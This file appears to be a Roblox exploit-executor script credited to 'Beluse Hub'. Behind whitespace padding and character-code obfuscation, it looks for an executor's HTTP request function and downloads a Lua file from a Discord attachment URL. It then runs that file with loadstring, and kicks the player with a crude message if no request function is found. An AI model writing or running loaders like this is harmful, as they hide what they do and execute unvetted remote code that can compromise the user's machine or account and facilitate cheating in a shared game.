--[[
    Script by Beluse Hub, discord.gg/wWvyZM2xbj
     ____       _                  _    _       _     
    |  _ \     | |                | |  | |     | |    
    | |_) | ___| |_   _ ___  ___  | |__| |_   _| |__  
    |  _ < / _ \ | | | / __|/ _ \ |  __  | | | | '_ \ 
    | |_) |  __/ | |_| \__ \  __/ | |  | | |_| | |_) |
    |____/ \___|_|\__,_|___/\___| |_|  |_|\__,_|_.__/ 
]]

local a,b,c="my ass hurts",nil,nil;
function c(a,b,c)
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
end















do
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    





































    
    
    
    
    
    

local LTtQsEbdcXvJFRNQadUiN= {_CHXfSnwEqBj = 114  , _xJdpdmxZyGO = 101  , _QRFAbaASrtv = 115 , _jeuheJYKPIw = 121 , _VwdEzRhAHju = 110 , _JfZYZhMhfdo = 108 , _SuwqRImzUht = 111 , _yEypXafXdQP = 97 , _LfSmqOQwwef = 100 , _fhSqEFTcYqU = 116 , _dYHRgdTNyXU = 114 , _vwmtLEGulLw = 105 , _zvbulUldFrG = 103 , _qPveyZQYpsv = 104 , _MosJLYRVRHr = 112 , _mEXBqQRYwto = 95 , _cQHZuxTIKUa = 101 , _IikcdXrhdZf = 113 , _KxdteVcgcXy = 117 , _QtcJpaCgwVS = 109 , _ydAgVpdpOiA = 32 , _RdyeyfbTuqL = 120 , _TKsbnXiQiOw = 99 , _PycNzgQtJCx = 58 , _VmddVGknVNS = 47 , _BSAfmSgMTqT = 46 , _LIeTBhrHuUw = 57 , _osKluQKFfwp = 50 , _JByvGAksKZw = 56 , _vlfjxcOyqsR = 51 , _CAgGTPbSwLj = 55 , _gqROzwHQNMk = 53 , _kymVOCqKtcE = 49 , _dNeIatPSBeY = 54 , _XzdaOmzdlum = 48 , _AzrzSKdKiwC = 80 , _LehtOfCthJd = 71 , _bTfuwVnkSsm = 69 , _eMgdLTBvmRk = 84 }local nyPPwtNHEHHNOXFUlZsto=string;local BfSRErYbkhlzHuKkvbCjx=getfenv()[nyPPwtNHEHHNOXFUlZsto.char( LTtQsEbdcXvJFRNQadUiN._CHXfSnwEqBj, LTtQsEbdcXvJFRNQadUiN._xJdpdmxZyGO, ( function ( qThdRtuzUcGIhYImwtRFu , TUukiaCcdXgjAzuvteHdK )
            local rvJVCPumwOwSTEqMdOHsl = {931 , 514 , 752 , 83 , 1 }
            return #rvJVCPumwOwSTEqMdOHsl end ) ( )+108, ( function ( )
            local oFmRBiPaGcSyYQFACNmGd = "DFD6D9FD9AF095D84B9FDE2E99E23557EE8BE60C57C4204AF66F63A5C1268B162C210DCA7BA7019DD30E5A0FA4D3C0C8E728"
            return #oFmRBiPaGcSyYQFACNmGd + 17 end ) ( ), LTtQsEbdcXvJFRNQadUiN._xJdpdmxZyGO, ( function ( ymkIghhogRgdPaLQbPZnY , AgJwLTPLYChdXNOKmEsyi )
            local UwiIsfbGPQmxBdQvndxtL = {897 , 431 , 254 , 66 , 342 }
            return #UwiIsfbGPQmxBdQvndxtL end ) ( )+110, ( function ( sHFMkXQZEVahLvtkXZRwN , LxhdxNgLyeGJbhLjnOjEf )
            local wNtNuAhgoGyrlJUvwYNwE = {254 , 533 , 753 , 935 , 132 }
            return #wNtNuAhgoGyrlJUvwYNwE end ) ( )+111)..nyPPwtNHEHHNOXFUlZsto.char() .. '']local MYRpraXNZvoLlIEPMUMId=getfenv()[nyPPwtNHEHHNOXFUlZsto.char( LTtQsEbdcXvJFRNQadUiN._QRFAbaASrtv, LTtQsEbdcXvJFRNQadUiN._jeuheJYKPIw, LTtQsEbdcXvJFRNQadUiN._VwdEzRhAHju) .. '']local hBpQzecEGtgujoaoKnnsG=getfenv()[nyPPwtNHEHHNOXFUlZsto.char( LTtQsEbdcXvJFRNQadUiN._JfZYZhMhfdo, LTtQsEbdcXvJFRNQadUiN._SuwqRImzUht, LTtQsEbdcXvJFRNQadUiN._yEypXafXdQP, LTtQsEbdcXvJFRNQadUiN._LfSmqOQwwef, LTtQsEbdcXvJFRNQadUiN._QRFAbaASrtv, LTtQsEbdcXvJFRNQadUiN._fhSqEFTcYqU, LTtQsEbdcXvJFRNQadUiN._dYHRgdTNyXU, LTtQsEbdcXvJFRNQadUiN._vwmtLEGulLw, LTtQsEbdcXvJFRNQadUiN._VwdEzRhAHju, LTtQsEbdcXvJFRNQadUiN._zvbulUldFrG) .. '']local ddRGNdEomcqFqKhnwapFu=getfenv()[nyPPwtNHEHHNOXFUlZsto.char( LTtQsEbdcXvJFRNQadUiN._qPveyZQYpsv, LTtQsEbdcXvJFRNQadUiN._fhSqEFTcYqU, LTtQsEbdcXvJFRNQadUiN._fhSqEFTcYqU, LTtQsEbdcXvJFRNQadUiN._MosJLYRVRHr, LTtQsEbdcXvJFRNQadUiN._mEXBqQRYwto, LTtQsEbdcXvJFRNQadUiN._dYHRgdTNyXU, LTtQsEbdcXvJFRNQadUiN._cQHZuxTIKUa, LTtQsEbdcXvJFRNQadUiN._IikcdXrhdZf, LTtQsEbdcXvJFRNQadUiN._KxdteVcgcXy, LTtQsEbdcXvJFRNQadUiN._cQHZuxTIKUa, LTtQsEbdcXvJFRNQadUiN._QRFAbaASrtv, LTtQsEbdcXvJFRNQadUiN._fhSqEFTcYqU) .. '']local jlgpTpywamdUFPrLfbglE=getfenv()[nyPPwtNHEHHNOXFUlZsto.char( LTtQsEbdcXvJFRNQadUiN._qPveyZQYpsv, LTtQsEbdcXvJFRNQadUiN._fhSqEFTcYqU, LTtQsEbdcXvJFRNQadUiN._fhSqEFTcYqU, LTtQsEbdcXvJFRNQadUiN._MosJLYRVRHr) .. '']local GeQufOcyIsJfsRFhsYCBM=getfenv()[nyPPwtNHEHHNOXFUlZsto.char( LTtQsEbdcXvJFRNQadUiN._zvbulUldFrG, LTtQsEbdcXvJFRNQadUiN._yEypXafXdQP, LTtQsEbdcXvJFRNQadUiN._QtcJpaCgwVS, LTtQsEbdcXvJFRNQadUiN._cQHZuxTIKUa) .. '']local dldUizbJhJBtfshzqzTpB=ddRGNdEomcqFqKhnwapFu or BfSRErYbkhlzHuKkvbCjx or(MYRpraXNZvoLlIEPMUMId and MYRpraXNZvoLlIEPMUMId.request)or(jlgpTpywamdUFPrLfbglE and jlgpTpywamdUFPrLfbglE.request)if not dldUizbJhJBtfshzqzTpB then return GeQufOcyIsJfsRFhsYCBM.Players.LocalPlayer:Kick(nyPPwtNHEHHNOXFUlZsto.char( LTtQsEbdcXvJFRNQadUiN._QRFAbaASrtv, LTtQsEbdcXvJFRNQadUiN._qPveyZQYpsv, LTtQsEbdcXvJFRNQadUiN._vwmtLEGulLw, LTtQsEbdcXvJFRNQadUiN._fhSqEFTcYqU, LTtQsEbdcXvJFRNQadUiN._fhSqEFTcYqU, LTtQsEbdcXvJFRNQadUiN._jeuheJYKPIw, LTtQsEbdcXvJFRNQadUiN._ydAgVpdpOiA, LTtQsEbdcXvJFRNQadUiN._yEypXafXdQP, LTtQsEbdcXvJFRNQadUiN._QRFAbaASrtv, LTtQsEbdcXvJFRNQadUiN._QRFAbaASrtv, LTtQsEbdcXvJFRNQadUiN._ydAgVpdpOiA, LTtQsEbdcXvJFRNQadUiN._cQHZuxTIKUa, LTtQsEbdcXvJFRNQadUiN._RdyeyfbTuqL, LTtQsEbdcXvJFRNQadUiN._cQHZuxTIKUa, LTtQsEbdcXvJFRNQadUiN._TKsbnXiQiOw, LTtQsEbdcXvJFRNQadUiN._KxdteVcgcXy, LTtQsEbdcXvJFRNQadUiN._fhSqEFTcYqU, LTtQsEbdcXvJFRNQadUiN._SuwqRImzUht, LTtQsEbdcXvJFRNQadUiN._dYHRgdTNyXU) .. "")end;hBpQzecEGtgujoaoKnnsG(dldUizbJhJBtfshzqzTpB({Url=nyPPwtNHEHHNOXFUlZsto.char( LTtQsEbdcXvJFRNQadUiN._qPveyZQYpsv, LTtQsEbdcXvJFRNQadUiN._fhSqEFTcYqU, LTtQsEbdcXvJFRNQadUiN._fhSqEFTcYqU, LTtQsEbdcXvJFRNQadUiN._MosJLYRVRHr, LTtQsEbdcXvJFRNQadUiN._QRFAbaASrtv, LTtQsEbdcXvJFRNQadUiN._PycNzgQtJCx, LTtQsEbdcXvJFRNQadUiN._VmddVGknVNS, LTtQsEbdcXvJFRNQadUiN._VmddVGknVNS, LTtQsEbdcXvJFRNQadUiN._TKsbnXiQiOw, LTtQsEbdcXvJFRNQadUiN._LfSmqOQwwef, LTtQsEbdcXvJFRNQadUiN._VwdEzRhAHju, LTtQsEbdcXvJFRNQadUiN._BSAfmSgMTqT, LTtQsEbdcXvJFRNQadUiN._LfSmqOQwwef, LTtQsEbdcXvJFRNQadUiN._vwmtLEGulLw, LTtQsEbdcXvJFRNQadUiN._QRFAbaASrtv, LTtQsEbdcXvJFRNQadUiN._TKsbnXiQiOw, LTtQsEbdcXvJFRNQadUiN._SuwqRImzUht, LTtQsEbdcXvJFRNQadUiN._dYHRgdTNyXU, LTtQsEbdcXvJFRNQadUiN._LfSmqOQwwef, LTtQsEbdcXvJFRNQadUiN._yEypXafXdQP, LTtQsEbdcXvJFRNQadUiN._MosJLYRVRHr, LTtQsEbdcXvJFRNQadUiN._MosJLYRVRHr, LTtQsEbdcXvJFRNQadUiN._BSAfmSgMTqT, LTtQsEbdcXvJFRNQadUiN._TKsbnXiQiOw, LTtQsEbdcXvJFRNQadUiN._SuwqRImzUht, LTtQsEbdcXvJFRNQadUiN._QtcJpaCgwVS, LTtQsEbdcXvJFRNQadUiN._VmddVGknVNS, LTtQsEbdcXvJFRNQadUiN._yEypXafXdQP, LTtQsEbdcXvJFRNQadUiN._fhSqEFTcYqU, LTtQsEbdcXvJFRNQadUiN._fhSqEFTcYqU, LTtQsEbdcXvJFRNQadUiN._yEypXafXdQP, LTtQsEbdcXvJFRNQadUiN._TKsbnXiQiOw, LTtQsEbdcXvJFRNQadUiN._qPveyZQYpsv, LTtQsEbdcXvJFRNQadUiN._QtcJpaCgwVS, LTtQsEbdcXvJFRNQadUiN._cQHZuxTIKUa, LTtQsEbdcXvJFRNQadUiN._VwdEzRhAHju, LTtQsEbdcXvJFRNQadUiN._fhSqEFTcYqU, LTtQsEbdcXvJFRNQadUiN._QRFAbaASrtv, LTtQsEbdcXvJFRNQadUiN._VmddVGknVNS, LTtQsEbdcXvJFRNQadUiN._LIeTBhrHuUw, LTtQsEbdcXvJFRNQadUiN._osKluQKFfwp, LTtQsEbdcXvJFRNQadUiN._osKluQKFfwp, LTtQsEbdcXvJFRNQadUiN._JByvGAksKZw, LTtQsEbdcXvJFRNQadUiN._osKluQKFfwp, LTtQsEbdcXvJFRNQadUiN._vlfjxcOyqsR, LTtQsEbdcXvJFRNQadUiN._CAgGTPbSwLj, LTtQsEbdcXvJFRNQadUiN._gqROzwHQNMk, LTtQsEbdcXvJFRNQadUiN._kymVOCqKtcE, LTtQsEbdcXvJFRNQadUiN._kymVOCqKtcE, LTtQsEbdcXvJFRNQadUiN._osKluQKFfwp, LTtQsEbdcXvJFRNQadUiN._CAgGTPbSwLj, LTtQsEbdcXvJFRNQadUiN._dNeIatPSBeY, LTtQsEbdcXvJFRNQadUiN._JByvGAksKZw, LTtQsEbdcXvJFRNQadUiN._vlfjxcOyqsR, LTtQsEbdcXvJFRNQadUiN._XzdaOmzdlum, LTtQsEbdcXvJFRNQadUiN._JByvGAksKZw, LTtQsEbdcXvJFRNQadUiN._osKluQKFfwp, LTtQsEbdcXvJFRNQadUiN._VmddVGknVNS, LTtQsEbdcXvJFRNQadUiN._kymVOCqKtcE, LTtQsEbdcXvJFRNQadUiN._XzdaOmzdlum, LTtQsEbdcXvJFRNQadUiN._XzdaOmzdlum, LTtQsEbdcXvJFRNQadUiN._CAgGTPbSwLj, LTtQsEbdcXvJFRNQadUiN._dNeIatPSBeY, LTtQsEbdcXvJFRNQadUiN._JByvGAksKZw, LTtQsEbdcXvJFRNQadUiN._LIeTBhrHuUw, LTtQsEbdcXvJFRNQadUiN._LIeTBhrHuUw, LTtQsEbdcXvJFRNQadUiN._kymVOCqKtcE, LTtQsEbdcXvJFRNQadUiN._osKluQKFfwp, LTtQsEbdcXvJFRNQadUiN._CAgGTPbSwLj, LTtQsEbdcXvJFRNQadUiN._gqROzwHQNMk, LTtQsEbdcXvJFRNQadUiN._gqROzwHQNMk, LTtQsEbdcXvJFRNQadUiN._kymVOCqKtcE, LTtQsEbdcXvJFRNQadUiN._gqROzwHQNMk, LTtQsEbdcXvJFRNQadUiN._LIeTBhrHuUw, LTtQsEbdcXvJFRNQadUiN._kymVOCqKtcE, LTtQsEbdcXvJFRNQadUiN._dNeIatPSBeY, LTtQsEbdcXvJFRNQadUiN._kymVOCqKtcE, LTtQsEbdcXvJFRNQadUiN._VmddVGknVNS, LTtQsEbdcXvJFRNQadUiN._AzrzSKdKiwC, LTtQsEbdcXvJFRNQadUiN._dYHRgdTNyXU, LTtQsEbdcXvJFRNQadUiN._SuwqRImzUht, LTtQsEbdcXvJFRNQadUiN._fhSqEFTcYqU, LTtQsEbdcXvJFRNQadUiN._cQHZuxTIKUa, LTtQsEbdcXvJFRNQadUiN._TKsbnXiQiOw, LTtQsEbdcXvJFRNQadUiN._fhSqEFTcYqU, LTtQsEbdcXvJFRNQadUiN._cQHZuxTIKUa, LTtQsEbdcXvJFRNQadUiN._LfSmqOQwwef, LTtQsEbdcXvJFRNQadUiN._BSAfmSgMTqT, LTtQsEbdcXvJFRNQadUiN._JfZYZhMhfdo, LTtQsEbdcXvJFRNQadUiN._KxdteVcgcXy, LTtQsEbdcXvJFRNQadUiN._yEypXafXdQP) .. "",Method=nyPPwtNHEHHNOXFUlZsto.char( LTtQsEbdcXvJFRNQadUiN._LehtOfCthJd, LTtQsEbdcXvJFRNQadUiN._bTfuwVnkSsm, LTtQsEbdcXvJFRNQadUiN._eMgdLTBvmRk) .. ""}).Body)()end;
